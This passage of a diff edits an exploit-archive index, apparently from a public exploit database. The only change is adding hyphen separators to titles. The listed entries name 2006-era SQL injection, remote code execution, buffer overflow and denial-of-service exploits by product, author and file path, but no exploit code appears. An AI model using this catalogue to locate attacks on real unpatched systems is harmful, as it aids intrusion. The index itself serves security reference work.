0.4 - (path) Arbitrary Remote Inclusion Exploit",2006-02-03,rgod,php,webapps,0 1468,platforms/php/webapps/1468.php,"Clever Copy <= 3.0 Admin Auth Details / Remote SQL Injection Exploit",2006-02-04,rgod,php,webapps,0 -1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 (Style Changer/Demo Mod) SQL Injection Exploit",2006-02-05,SkOd,php,webapps,0 +1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection Exploit",2006-02-05,SkOd,php,webapps,0 1470,platforms/windows/local/1470.c,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow Exploit",2006-02-06,bratax,windows,local,0 -1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 (PATH_INFO) Arbitrary Command Execution Exploit",2006-02-06,Hessam-x,cgi,webapps,0 -1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit",2006-02-06,Zodiac,asp,webapps,0 +1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution Exploit",2006-02-06,Hessam-x,cgi,webapps,0 +1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook <= 5.5 - (Auth Bypass) SQL Injection Exploit",2006-02-06,Zodiac,asp,webapps,0 1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth (Reset Display) Denial of Service Exploit",2006-02-06,"Pierre Betouin",hardware,dos,0 -1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 location.QueryInterface() Code Execution (Linux)",2006-02-07,"H D Moore",linux,remote,0 +1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (Linux)",2006-02-07,"H D Moore",linux,remote,0 1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - (urlmon.dll) Denial of Service",2006-02-07,"Tom Ferris",windows,dos,0 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Local Root Exploit",2006-02-08,kokanin,qnx,local,0 @@ -1228,130 +1228,130 @@ id,file,description,date,author,platform,type,port 1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (Non Steam) - Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0 -1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0 -1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532 +1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 - (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0 +1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 - (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532 1487,platforms/linux/remote/1487.c,"OpenVMPSd <= 1.3 - Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,1589 1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - (.hhp) Denial of Service",2006-02-10,darkeagle,windows,dos,0 -1489,platforms/multiple/dos/1489.pl,"Invision Power Board <= 2.1.4 (Register Users) Denial of Service Exploit",2006-02-10,SkOd,multiple,dos,0 +1489,platforms/multiple/dos/1489.pl,"Invision Power Board <= 2.1.4 - (Register Users) Denial of Service Exploit",2006-02-10,SkOd,multiple,dos,0 1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow Exploit (2)",2006-02-11,k3xji,windows,local,0 -1491,platforms/php/webapps/1491.php,"DocMGR <= 0.54.2 (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0 +1491,platforms/php/webapps/1491.php,"DocMGR <= 0.54.2 - (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection Exploit",2006-02-13,fRoGGz,php,webapps,0 1493,platforms/php/webapps/1493.php,"EnterpriseGS <= 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 -1494,platforms/php/webapps/1494.php,"FlySpray 0.9.7 (install-0.9.7.php) Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 +1494,platforms/php/webapps/1494.php,"FlySpray 0.9.7 - (install-0.9.7.php) Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 1495,platforms/windows/local/1495.cpp,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow Exploit (3)",2006-02-14,darkeagle,windows,local,0 1496,platforms/hardware/dos/1496.c,"D-Link Wireless Access Point (Fragmented UDP) DoS Exploit",2006-02-14,"Aaron Portnoy",hardware,dos,0 -1498,platforms/php/webapps/1498.php,"webSPELL <= 4.01 (title_op) Remote SQL Injection Exploit",2006-02-14,x128,php,webapps,0 +1498,platforms/php/webapps/1498.php,"webSPELL <= 4.01 - (title_op) Remote SQL Injection Exploit",2006-02-14,x128,php,webapps,0 1499,platforms/php/webapps/1499.pl,"MyBulletinBoard (MyBB) <= 1.03 - Multiple SQL Injection Exploit",2006-02-15,"HACKERS PAL",php,webapps,0 1500,platforms/windows/dos/1500.cpp,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0 -1501,platforms/php/webapps/1501.php,"PHPKIT <= 1.6.1R2 (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 +1501,platforms/php/webapps/1501.php,"PHPKIT <= 1.6.1R2 - (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 1502,platforms/windows/remote/1502.py,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 -1503,platforms/php/webapps/1503.pl,"YapBB <= 1.2 (cfgIncludeDirectory) Remote Command Execution Exploit",2006-02-16,cijfer,php,webapps,0 +1503,platforms/php/webapps/1503.pl,"YapBB <= 1.2 - (cfgIncludeDirectory) Remote Command Execution Exploit",2006-02-16,cijfer,php,webapps,0 1504,platforms/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow Exploit (MS06-006) (Metasploit)",2006-02-17,"H D Moore",windows,remote,0 1505,platforms/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow Exploit (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0 1506,platforms/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0 -1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 (referer) Remote Command Execution Exploit",2006-02-17,RusH,cgi,webapps,0 -1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 (rollid) Remote SQL Injection Exploit",2006-02-17,RusH,php,webapps,0 -1510,platforms/php/webapps/1510.pl,"Gravity Board X <= 1.1 (csscontent) Remote Code Execution Exploit",2006-02-17,RusH,php,webapps,0 +1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution Exploit",2006-02-17,RusH,cgi,webapps,0 +1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - (rollid) Remote SQL Injection Exploit",2006-02-17,RusH,php,webapps,0 +1510,platforms/php/webapps/1510.pl,"Gravity Board X <= 1.1 - (csscontent) Remote Code Execution Exploit",2006-02-17,RusH,php,webapps,0 1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery <= 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0 -1512,platforms/php/webapps/1512.pl,"Admbook <= 1.2.2 (X-Forwarded-For) Remote Command Execution Exploit",2006-02-19,rgod,php,webapps,0 -1513,platforms/php/webapps/1513.php,"BXCP <= 0.2.9.9 (tid) Remote SQL Injection Exploit",2006-02-19,x128,php,webapps,0 +1512,platforms/php/webapps/1512.pl,"Admbook <= 1.2.2 - (X-Forwarded-For) Remote Command Execution Exploit",2006-02-19,rgod,php,webapps,0 +1513,platforms/php/webapps/1513.php,"BXCP <= 0.2.9.9 - (tid) Remote SQL Injection Exploit",2006-02-19,x128,php,webapps,0 1514,platforms/asp/webapps/1514.pl,"MiniNuke <= 1.8.2b (pages.asp) Remote SQL Injection Exploit",2006-02-19,nukedx,asp,webapps,0 1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0 1516,platforms/php/webapps/1516.php,"ilchClan <= 1.05g (tid) Remote SQL Injection Exploit",2006-02-20,x128,php,webapps,0 1517,platforms/php/dos/1517.c,"PunBB <= 2.0.10 - (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,dos,0 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 - User-Defined Function (UDF) Local Privilege Escalation Exploit (Linux)",2006-02-20,"Marco Ivaldi",linux,local,0 -1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser (Safe File) Remote Code Execution Exploit",2006-02-22,"H D Moore",osx,remote,0 +1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser - (Safe File) Remote Code Execution Exploit",2006-02-22,"H D Moore",osx,remote,0 1520,platforms/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow Exploit (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote,0 -1521,platforms/php/webapps/1521.php,"Noahs Classifieds <= 1.3 (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0 -1522,platforms/php/webapps/1522.php,"NOCC Webmail <= 1.0 (Local Inclusion) Remote Code Execution Exploit",2006-02-23,rgod,php,webapps,0 +1521,platforms/php/webapps/1521.php,"Noahs Classifieds <= 1.3 - (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0 +1522,platforms/php/webapps/1522.php,"NOCC Webmail <= 1.0 - (Local Inclusion) Remote Code Execution Exploit",2006-02-23,rgod,php,webapps,0 1523,platforms/php/webapps/1523.cpp,"PHP-Nuke 7.5 - 7.8 (Search) Remote SQL Injection Exploit",2006-02-23,unitedbr,php,webapps,0 -1524,platforms/php/webapps/1524.htm,"VHCS <= 2.4.7.1 (Add User) Authentication Bypass Exploit",2006-02-23,RoMaNSoFt,php,webapps,0 +1524,platforms/php/webapps/1524.htm,"VHCS <= 2.4.7.1 - (Add User) Authentication Bypass Exploit",2006-02-23,RoMaNSoFt,php,webapps,0 1525,platforms/php/webapps/1525.pl,"phpWebSite <= 0.10.0-full (topics.php) Remote SQL Injection Exploit",2006-02-24,SnIpEr_SA,php,webapps,0 1526,platforms/php/webapps/1526.php,"Lansuite <= 2.1.0 Beta (fid) Remote SQL Injection Exploit",2006-02-24,x128,php,webapps,0 -1527,platforms/php/webapps/1527.pl,"iGENUS WebMail <= 2.0.2 (config_inc.php) Remote Code Execution Exploit",2006-02-25,rgod,php,webapps,0 -1528,platforms/asp/webapps/1528.pl,"Pentacle In-Out Board <= 6.03 (newsdetailsview) Remote SQL Injection",2006-02-25,nukedx,asp,webapps,0 -1529,platforms/asp/webapps/1529.htm,"Pentacle In-Out Board <= 6.03 (login.asp) Remote Auth Bypass",2006-02-25,nukedx,asp,webapps,0 -1530,platforms/php/webapps/1530.pl,"SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit",2006-02-25,SnIpEr_SA,php,webapps,0 +1527,platforms/php/webapps/1527.pl,"iGENUS WebMail <= 2.0.2 - (config_inc.php) Remote Code Execution Exploit",2006-02-25,rgod,php,webapps,0 +1528,platforms/asp/webapps/1528.pl,"Pentacle In-Out Board <= 6.03 - (newsdetailsview) Remote SQL Injection",2006-02-25,nukedx,asp,webapps,0 +1529,platforms/asp/webapps/1529.htm,"Pentacle In-Out Board <= 6.03 - (login.asp) Remote Auth Bypass",2006-02-25,nukedx,asp,webapps,0 +1530,platforms/php/webapps/1530.pl,"SaphpLesson 2.0 - (forumid) Remote SQL Injection Exploit",2006-02-25,SnIpEr_SA,php,webapps,0 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server <= 1.4.3.5 - Remote Buffer Overflow PoC",2006-02-25,"Jerome Athias",windows,dos,0 -1532,platforms/php/webapps/1532.pl,"PwsPHP <= 1.2.3 (index.php) Remote SQL Injection Exploit",2006-02-25,papipsycho,php,webapps,0 +1532,platforms/php/webapps/1532.pl,"PwsPHP <= 1.2.3 - (index.php) Remote SQL Injection Exploit",2006-02-25,papipsycho,php,webapps,0 1533,platforms/php/webapps/1533.php,"4Images <= 1.7.1 - (Local Inclusion) Remote Code Execution Exploit",2006-02-26,rgod,php,webapps,0 1534,platforms/sco/local/1534.c,"SCO Unixware 7.1.3 - (ptrace) Local Privilege Escalation Exploit",2006-02-26,prdelka,sco,local,0 1535,platforms/windows/dos/1535.c,"CrossFire <= 1.8.0 - (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0 -1536,platforms/windows/remote/1536.pm,"Microsoft Internet Explorer 6.0 SP0 IsComponentInstalled() Remote Exploit",2006-02-28,"H D Moore",windows,remote,0 +1536,platforms/windows/remote/1536.pm,"Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit",2006-02-28,"H D Moore",windows,remote,0 1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow",2006-02-28,y0,windows,remote,44334 1538,platforms/php/webapps/1538.pl,"farsinews <= 2.5 - Directory Traversal arbitrary (users.db) access Exploit",2006-02-28,Hessam-x,php,webapps,0 -1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) <= 1.03 (misc.php COMMA) SQL Injection",2006-02-28,Devil-00,php,webapps,0 +1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) <= 1.03 - (misc.php COMMA) SQL Injection",2006-02-28,Devil-00,php,webapps,0 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service Exploit",2006-02-28,"Evgeny Legerov",bsd,dos,0 -1541,platforms/php/webapps/1541.pl,"Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit",2006-03-01,str0ke,php,webapps,0 +1541,platforms/php/webapps/1541.pl,"Limbo CMS <= 1.0.4.2 - (ItemID) Remote Code Execution Exploit",2006-03-01,str0ke,php,webapps,0 1542,platforms/php/webapps/1542.pl,"phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution",2006-03-01,LorD,php,webapps,0 -1543,platforms/php/webapps/1543.pl,"vuBB <= 0.2 (Cookie) Final Remote SQL Injection Exploit (mq=off)",2006-03-01,KingOfSka,php,webapps,0 +1543,platforms/php/webapps/1543.pl,"vuBB <= 0.2 - (Cookie) Final Remote SQL Injection Exploit (mq=off)",2006-03-01,KingOfSka,php,webapps,0 1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x Datenbank MOD (fileid) Remote SQL Injection",2006-03-01,nukedx,php,webapps,0 1545,platforms/osx/local/1545.pl,"Apple Mac OS X - (/usr/bin/passwd) Custom Passwd Local Root Exploit",2006-03-01,vade79,osx,local,0 1546,platforms/php/webapps/1546.pl,"phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - (XSS/SQL) Multiple Vulnerabilities (PoC)",2006-03-02,lorenzo,php,webapps,0 -1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) <= 1.04 (misc.php COMMA) SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0 +1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) <= 1.04 - (misc.php COMMA) SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0 1549,platforms/php/webapps/1549.php,"PHP-Stats <= 0.1.9.1 - Remote Commands Execution Exploit",2006-03-04,rgod,php,webapps,0 -1550,platforms/asp/webapps/1550.txt,"TotalECommerce <= 1.0 (index.asp id) Remote SQL Injection Exploit",2006-03-04,nukedx,asp,webapps,0 +1550,platforms/asp/webapps/1550.txt,"TotalECommerce <= 1.0 - (index.asp id) Remote SQL Injection Exploit",2006-03-04,nukedx,asp,webapps,0 1551,platforms/hardware/dos/1551.txt,"Multiple Routers (IRC Request) Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0 -1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 (Port) Remote Overflow PoC",2006-03-04,luka.research,windows,dos,0 -1553,platforms/php/webapps/1553.pl,"Fantastic News <= 2.1.2 (script_path) Remote Code Execution Exploit",2006-03-04,uid0,php,webapps,0 -1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 (BitsPerSample Tag) Local Buffer Overflow Exploit",2006-03-05,"Agustin Gianni",multiple,local,0 -1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 (Malformed .dbp File) Buffer Overflow Exploit",2006-03-05,Kozan,windows,local,0 +1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - (Port) Remote Overflow PoC",2006-03-04,luka.research,windows,dos,0 +1553,platforms/php/webapps/1553.pl,"Fantastic News <= 2.1.2 - (script_path) Remote Code Execution Exploit",2006-03-04,uid0,php,webapps,0 +1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 - (BitsPerSample Tag) Local Buffer Overflow Exploit",2006-03-05,"Agustin Gianni",multiple,local,0 +1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - (Malformed .dbp File) Buffer Overflow Exploit",2006-03-05,Kozan,windows,local,0 1556,platforms/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod (load) Remote SQL Injection Exploit",2006-03-06,SkOd,php,webapps,0 -1557,platforms/windows/dos/1557.c,"Freeciv <= 2.0.7 (Jumbo Malloc) Denial of Service Crash",2006-03-06,"Luigi Auriemma",windows,dos,0 +1557,platforms/windows/dos/1557.c,"Freeciv <= 2.0.7 - (Jumbo Malloc) Denial of Service Crash",2006-03-06,"Luigi Auriemma",windows,dos,0 1558,platforms/windows/dos/1558.c,"LieroX <= 0.62b Remote Server/Client Denial of Service Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 1559,platforms/windows/dos/1559.c,"Sauerbraten <= 2006_02_28 - Multiple BoF/Crash Vulnerabilities Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 1560,platforms/windows/dos/1560.c,"Cube <= 2005_08_29 - Multiple BoF/Crash Vulnerabilities Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 -1561,platforms/php/webapps/1561.pl,"OWL Intranet Engine 0.82 (xrms_file_root) Code Execution Exploit",2006-03-07,rgod,php,webapps,0 -1562,platforms/asp/webapps/1562.pl,"CilemNews System <= 1.1 (yazdir.asp haber_id) SQL Injection Exploit",2006-03-07,nukedx,asp,webapps,0 -1563,platforms/php/webapps/1563.pm,"Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit (Metasploit)",2006-03-07,sirh0t,php,webapps,0 +1561,platforms/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - (xrms_file_root) Code Execution Exploit",2006-03-07,rgod,php,webapps,0 +1562,platforms/asp/webapps/1562.pl,"CilemNews System <= 1.1 - (yazdir.asp haber_id) SQL Injection Exploit",2006-03-07,nukedx,asp,webapps,0 +1563,platforms/php/webapps/1563.pm,"Limbo CMS <= 1.0.4.2 - (ItemID) Remote Code Execution Exploit (Metasploit)",2006-03-07,sirh0t,php,webapps,0 1564,platforms/windows/dos/1564.c,"Alien Arena 2006 Gold Edition <= 5.00 - Multiple Vulnerabilities",2006-03-07,"Luigi Auriemma",windows,dos,0 -1565,platforms/windows/remote/1565.pl,"RevilloC MailServer 1.21 (USER) Remote Buffer Overflow Exploit PoC",2006-03-07,"securma massine",windows,remote,110 +1565,platforms/windows/remote/1565.pl,"RevilloC MailServer 1.21 - (USER) Remote Buffer Overflow Exploit PoC",2006-03-07,"securma massine",windows,remote,110 1566,platforms/php/webapps/1566.php,"Gallery <= 2.0.3 - stepOrder[] Remote Commands Execution Exploit",2006-03-08,rgod,php,webapps,0 -1567,platforms/php/webapps/1567.php,"RedBLoG <= 0.5 (cat_id) Remote SQL Injection Exploit",2006-03-08,x128,php,webapps,0 -1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 (memName) Remote SQL Injection Exploit",2006-03-09,DevilBox,asp,webapps,0 +1567,platforms/php/webapps/1567.php,"RedBLoG <= 0.5 - (cat_id) Remote SQL Injection Exploit",2006-03-08,x128,php,webapps,0 +1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 - (memName) Remote SQL Injection Exploit",2006-03-09,DevilBox,asp,webapps,0 1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - (date) Remote Code Execution",2006-03-09,Hessam-x,php,webapps,0 -1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 (Create Admin Bypass) Remote Exploit",2006-03-09,nukedx,asp,webapps,0 +1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 - (Create Admin Bypass) Remote Exploit",2006-03-09,nukedx,asp,webapps,0 1572,platforms/multiple/dos/1572.pl,"Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service",2006-03-10,str0ke,multiple,dos,0 1573,platforms/php/dos/1573.php,"Guppy <= 4.5.11 - (Delete Databases) Remote Denial of Service Exploit",2006-03-10,trueend5,php,dos,0 -1574,platforms/linux/remote/1574.c,"PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit",2006-03-11,prdelka,linux,remote,7144 -1575,platforms/php/webapps/1575.pl,"GuestBook Script <= 1.7 (include_files) Remote Code Execution Exploit",2006-03-11,rgod,php,webapps,0 +1574,platforms/linux/remote/1574.c,"PeerCast <= 0.1216 - (nextCGIarg) Remote Buffer Overflow Exploit",2006-03-11,prdelka,linux,remote,7144 +1575,platforms/php/webapps/1575.pl,"GuestBook Script <= 1.7 - (include_files) Remote Code Execution Exploit",2006-03-11,rgod,php,webapps,0 1576,platforms/php/webapps/1576.txt,"Jupiter CMS <= 1.1.5 - Multiple XSS Attack Vectors",2006-03-11,Nomenumbra,php,webapps,0 1577,platforms/irix/local/1577.sh,"SGI IRIX <= 6.5.28 - (runpriv) Design Error",2005-10-10,anonymous,irix,local,0 -1578,platforms/linux/remote/1578.c,"PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit (2)",2006-03-12,darkeagle,linux,remote,7144 +1578,platforms/linux/remote/1578.c,"PeerCast <= 0.1216 - (nextCGIarg) Remote Buffer Overflow Exploit (2)",2006-03-12,darkeagle,linux,remote,7144 1579,platforms/linux/local/1579.pl,"Ubuntu Breezy 5.10 - Installer Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local,0 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog <= 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0 1582,platforms/linux/remote/1582.c,"crossfire-server <= 1.9.0 - SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327 1583,platforms/osx/remote/1583.pl,"Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit",2006-03-13,"Kevin Finisterre",osx,remote,25 1584,platforms/windows/local/1584.cpp,"Microsoft Windows Telephony Service Command Execution Exploit (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0 -1585,platforms/php/webapps/1585.php,"php iCalendar <= 2.21 (Cookie) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 -1586,platforms/php/webapps/1586.php,"php iCalendar <= 2.21 (publish.ical.php) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 -1587,platforms/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 (include) Remote Code Execution Exploit",2006-03-15,uid0,php,webapps,0 +1585,platforms/php/webapps/1585.php,"php iCalendar <= 2.21 - (Cookie) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 +1586,platforms/php/webapps/1586.php,"php iCalendar <= 2.21 - (publish.ical.php) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 +1587,platforms/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 - (include) Remote Code Execution Exploit",2006-03-15,uid0,php,webapps,0 1588,platforms/php/webapps/1588.php,"nodez <= 4.6.1.1 mercury - Multiple Vulnerabilities",2006-03-18,rgod,php,webapps,0 -1589,platforms/asp/webapps/1589.pl,"BetaParticle Blog <= 6.0 (fldGalleryID) Remote SQL Injection Exploit",2006-03-18,nukedx,asp,webapps,0 -1590,platforms/php/webapps/1590.pl,"ShoutLIVE <= 1.1.0 (savesettings.php) Remote Code Execution Exploit",2006-03-18,DarkFig,php,webapps,0 +1589,platforms/asp/webapps/1589.pl,"BetaParticle Blog <= 6.0 - (fldGalleryID) Remote SQL Injection Exploit",2006-03-18,nukedx,asp,webapps,0 +1590,platforms/php/webapps/1590.pl,"ShoutLIVE <= 1.1.0 - (savesettings.php) Remote Code Execution Exploit",2006-03-18,DarkFig,php,webapps,0 1591,platforms/linux/local/1591.py,"Python <= 2.4.2 realpath() Local Stack Overflow Exploit",2006-03-18,"Gotfault Security",linux,local,0 1592,platforms/windows/remote/1592.c,"Mercur Mailserver 5.0 SP3 - (IMAP) Remote Buffer Overflow Exploit",2006-03-19,pLL,windows,remote,0 -1593,platforms/windows/dos/1593.c,"Mercur Mailserver 5.0 SP3 (IMAP) Denial of Service Exploit",2006-03-19,Omni,windows,dos,0 -1594,platforms/php/webapps/1594.py,"SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit",2006-03-19,LOTFREE,php,webapps,0 +1593,platforms/windows/dos/1593.c,"Mercur Mailserver 5.0 SP3 - (IMAP) Denial of Service Exploit",2006-03-19,Omni,windows,dos,0 +1594,platforms/php/webapps/1594.py,"SoftBB 0.1 - (mail) Remote Blind SQL Injection Exploit",2006-03-19,LOTFREE,php,webapps,0 1595,platforms/php/webapps/1595.php,"gCards <= 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,php,webapps,0 1596,platforms/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation Exploit",2006-03-20,"H D Moore",linux,local,0 -1597,platforms/asp/webapps/1597.pl,"ASPPortal <= 3.1.1 (downloadid) Remote SQL Injection Exploit",2006-03-20,nukedx,asp,webapps,0 -1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6.0 (script action handlers) (mshtml.dll) DoS",2006-03-21,"Michal Zalewski",windows,dos,0 +1597,platforms/asp/webapps/1597.pl,"ASPPortal <= 3.1.1 - (downloadid) Remote SQL Injection Exploit",2006-03-20,nukedx,asp,webapps,0 +1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6.0 - (script action handlers) (mshtml.dll) DoS",2006-03-21,"Michal Zalewski",windows,dos,0 1599,platforms/windows/dos/1599.cpp,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007)",2006-03-21,"Alexey Sintsov",windows,dos,0 -1600,platforms/php/webapps/1600.php,"FreeWPS <= 2.11 (images.php) Remote Code Execution Exploit",2006-03-21,x128,php,webapps,0 +1600,platforms/php/webapps/1600.php,"FreeWPS <= 2.11 - (images.php) Remote Code Execution Exploit",2006-03-21,x128,php,webapps,0 1601,platforms/windows/dos/1601.c,"ASP.NET w3wp (COM Components) Remote Crash Exploit",2006-03-22,"Debasis Mohanty",windows,dos,0 1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow Exploit",2006-03-22,"esca zoo",multiple,remote,11000 1603,platforms/windows/dos/1603.c,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 -1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6.0 (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0 -1605,platforms/php/webapps/1605.php,"XHP CMS <= 0.5 (upload) Remote Command Execution Exploit",2006-03-22,rgod,php,webapps,0 +1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6.0 - (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0 +1605,platforms/php/webapps/1605.php,"XHP CMS <= 0.5 - (upload) Remote Command Execution Exploit",2006-03-22,rgod,php,webapps,0 1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - (createTextRang) Remote Code Execution Exploit",2006-03-23,darkeagle,windows,remote,0 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit",2006-03-23,ATmaCA,windows,remote,0 1608,platforms/php/webapps/1608.php,"WebAlbum <= 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0 -1609,platforms/php/webapps/1609.pl,"PHP Ticket <= 0.71 (search.php) Remote SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0 +1609,platforms/php/webapps/1609.pl,"PHP Ticket <= 0.71 - (search.php) Remote 